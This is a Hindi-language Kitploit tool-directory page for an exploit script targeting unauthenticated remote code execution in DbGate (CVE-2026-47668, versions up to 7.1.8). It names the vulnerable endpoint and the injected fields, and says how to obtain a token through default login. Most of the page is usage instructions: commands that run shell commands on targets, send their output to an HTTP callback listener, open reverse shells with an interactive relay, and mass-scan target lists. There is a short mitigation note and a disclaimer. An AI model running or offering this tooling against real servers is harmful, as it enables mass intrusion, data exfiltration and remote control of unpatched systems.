Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-47668 — DbGate बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2026-47668
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubnxploited/cve-2026-47668

CVE-2026-47668

DbGate बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन

रिपॉजिटरी देखें
643 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-47668 — DbGate रिमोट कोड निष्पादन

DbGate JSON स्क्रिप्ट रनर (dbgate-serve ≤ 7.1.8) में बिना प्रमाणीकरण के RCE।
मूल्यांकन उपकरण: CVE-2026-47668.py — केवल अधिकृत परीक्षण के लिए।

CVECVE-2026-47668
गंभीरतागंभीर
उत्पादDbGate / dbgate-serve
प्रभावित≤ 7.1.8
समाधान≥ 7.1.9
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-20, CWE-94, CWE-1188

कमजोरी

शीर्षक: DbGate JSON स्क्रिप्ट रनर के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन

उपयोगकर्ता-नियंत्रित फ़ील्ड (functionName, variableName) गतिशील रूप से उत्पन्न जावास्क्रिप्ट में उचित सत्यापन के बिना एम्बेड किए जाते हैं। एक हमलावर Node.js रनर चाइल्ड प्रक्रिया में मनमाना कोड निष्पादित कर सकता है।

आइटमविवरण
एंडपॉइंटPOST /runners/start
प्रमाणीकरणBearer आवश्यक; टोकन अज्ञात/डिफ़ॉल्ट डिप्लॉयमेंट पर POST /auth/login के माध्यम से प्राप्त किया जा सकता है
इंजेक्शनJSON assign कमांड में functionName, variableName
प्रभावDbGate प्रक्रिया उपयोगकर्ता के रूप में OS कमांड निष्पादन

शमन: 7.1.9+ पर अपग्रेड करें। नेटवर्क पहुंच प्रतिबंधित करें, अज्ञात प्रमाणीकरण अक्षम करें, क्रेडेंशियल बदलें, संदिग्ध /runners/start गतिविधि के लिए लॉग की समीक्षा करें।


संपर्क

टेलीग्राम: @KNxploited


उपकरण अवलोकन

CVE-2026-47668.py उन DbGate इंस्टेंसेस के विरुद्ध शोषण की जाँच और सत्यापन करता है जिनका परीक्षण करने के लिए आप अधिकृत हैं।

मोड

मोडरिवर्स शेलविवरण
AUTOनहींएक प्रॉम्प्ट; टोकन + HTTP कॉलबैक + डिफ़ॉल्ट
CLIवैकल्पिकफ़्लैग के माध्यम से पूर्ण नियंत्रण
Massनहींtargets.txt से स्कैन करें
--reverse-shellहाँवैकल्पिक TCP सत्यापन (केवल एक लक्ष्य)

परिणाम

परिणामअर्थ
FAILपहुँच योग्य नहीं, प्रमाणीकरण विफल, या कमजोर नहीं
VULNरनर ने केवल प्रोब स्वीकार किया
DISPATCHपेलोड भेजा गया; पुष्टि नहीं हुआ आउटपुट
EXFILकॉलबैक प्राप्त हुआ — पुष्टि कमांड आउटपुट
REVSHरिवर्स TCP कनेक्ट हुआ (केवल वैकल्पिक मोड)

आउटपुट निर्देशिका: Nx/ (vuln, dispatch, exfil, failed, list_report, प्रति-लक्ष्य फ़ाइलें exfil/ के अंतर्गत)


स्थापना

root@kitploit:~
pip install -r requirements.txt

आवश्यक: Python 3.9+, aiohttp, colorama


उपयोग

AUTO विज़ार्ड (डिफ़ॉल्ट — कोई रिवर्स शेल नहीं)

root@kitploit:~
python CVE-2026-47668.py
प्रॉम्प्ट पर इनपुटउदाहरण
एकल URLhttp://192.168.1.10:3000
URL + कमांडhttp://192.168.1.10:3000|id
लक्ष्य सूचीtargets.txt

CLI — फ़्लैग सक्षम करें

प्रत्येक CLI रन में --cli शामिल होना चाहिए।

root@kitploit:~
python CVE-2026-47668.py --cli [options]

एकल लक्ष्य

-u / --url — लक्ष्य आधार URL

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000

--cmd / --command — शेल कमांड (डिफ़ॉल्ट: id)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "id"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "uname -a"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "ls -la /tmp"

--check-only — केवल कमजोरी जाँच (कोई कमांड नहीं)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --check-only

--vector — इंजेक्शन वेक्टर: functionName | variableName | both

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --vector both --cmd id

--port — डिफ़ॉल्ट पोर्ट जब URL में पोर्ट न हो (डिफ़ॉल्ट: 3000)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10 --port 3000 --cmd id

--token — मौजूदा Bearer टोकन का उपयोग करें

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --token "eyJhbGciOi..." --cmd id

--login-json — कस्टम लॉगिन बॉडी (डिफ़ॉल्ट: {"amoid":"none"})

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --login-json "{\"amoid\":\"none\"}" --cmd id

--timeout — HTTP टाइमआउट सेकंड में

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --timeout 20 --cmd id

--secure — TLS प्रमाणपत्र सत्यापित करें

root@kitploit:~
python CVE-2026-47668.py --cli -u https://dbgate.example.com:3000 --secure --cmd id

कॉलबैक / एक्सफिल (CLI में --cmd के साथ डिफ़ॉल्ट)

--callback-host — IP/होस्टनाम जिसे लक्ष्य आपके सुनने वाले तक पहुँचने के लिए उपयोग करता है

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --callback-host 192.168.1.5 --cmd id

--listen-host — HTTP सुनने वाले के लिए स्थानीय बाइंड (डिफ़ॉल्ट: 0.0.0.0)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-host 0.0.0.0 --cmd id

--listen-port — HTTP एक्सफिल पोर्ट (डिफ़ॉल्ट: 8888)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-port 8888 --cmd id

-c / --callback — बाहरी कॉलबैक URL (अंतर्निहित सुनने वाले को अक्षम करता है)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 -c http://192.168.1.5:9999/ --cmd id

--wait-exfil — कॉलबैक की प्रतीक्षा करने के लिए सेकंड (एकल लक्ष्य, डिफ़ॉल्ट: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --wait-exfil 15 --cmd id

--no-b64 — आउटपुट base64 एन्कोडिंग के बिना भेजें

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --no-b64 --cmd id

--async-exec — execSync के बजाय async exec

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --async-exec --cmd id

बल्क स्कैन (कोई रिवर्स शेल नहीं)

-f / --file — लक्ष्य सूची फ़ाइल

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id

-t / --threads — समवर्ती कार्यकर्ता (डिफ़ॉल्ट: 30)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id -t 50

--mass-wait-exfil — बल्क में प्रति लक्ष्य कॉलबैक प्रतीक्षा (डिफ़ॉल्ट: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id --mass-wait-exfil 12

बल्क + कस्टम डिफ़ॉल्ट पोर्ट

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --port 3000 --cmd "id"

रिवर्स शेल (वैकल्पिक — केवल एकल लक्ष्य)

सामान्य परीक्षण के लिए आवश्यक नहीं। प्रमाण के लिए HTTP एक्सफिल (--cmd) का उपयोग करें।

--reverse-shell — लक्ष्य LHOST:LPORT से कनेक्ट होता है (मान छोड़ें = LAN IP + पोर्ट 4444)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444

--revsh-port — पोर्ट जब --reverse-shell में :port न हो

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5 --revsh-port 4444

--revsh-bind — स्थानीय सुनने का पता

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-bind 0.0.0.0

--wait-revsh — TCP के लिए प्रतीक्षा करें (डिफ़ॉल्ट: 15)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --wait-revsh 20

--revsh-interactive — कनेक्ट होने के बाद बुनियादी stdin/stdout रिले

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-interactive

Docker नोट: DbGate कंटेनर से पहुँच योग्य IP का उपयोग करें (जैसे होस्ट गेटवे), न कि केवल आपके PC पर 127.0.0.1।


लक्ष्य सूची (targets.txt)

root@kitploit:~
# comment
192.168.1.10
192.168.1.11:3000
http://10.0.0.8:3000
http://10.0.0.9|uname -a
https://dbgate.local|id
  • कोई पोर्ट नहीं → 3000 स्वचालित रूप से लागू
  • host|command → प्रति-पंक्ति कमांड ओवरराइड
  • रिपोर्ट: Nx/list_report.txt

आउटपुट फ़ाइलें

फ़ाइलसामग्री
Nx/vuln.txtकमजोर लक्ष्य (प्रोब OK)
Nx/dispatch.txtपेलोड भेजा गया, अपुष्ट
Nx/exfil.txtपुष्ट कॉलबैक
Nx/failed.txtविफल लक्ष्य
Nx/exfil/<host>.txtप्रति लक्ष्य कमांड आउटपुट
Nx/sessions/<id>/summary.jsonसत्र सारांश

कार्यप्रवाह

  1. POST /auth/login → Bearer टोकन (स्वचालित जब तक --token न हो)
  2. प्रोब → रनर इंजेक्शन स्वीकार करता है
  3. POST /runners/start → कमांड चलाएँ + HTTP कॉलबैक (या रिवर्स TCP यदि सक्षम हो)
  4. वर्गीकृत करें → EXFIL = पुष्ट आउटपुट

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण के लिए। किसी भी सिस्टम का परीक्षण करने के लिए आपके पास स्पष्ट अनुमति होनी चाहिए। लेखक दुरुपयोग या अवैध उपयोग के लिए जिम्मेदार नहीं है।


द्वारा: Nxploited

टूल डाउनलोड करें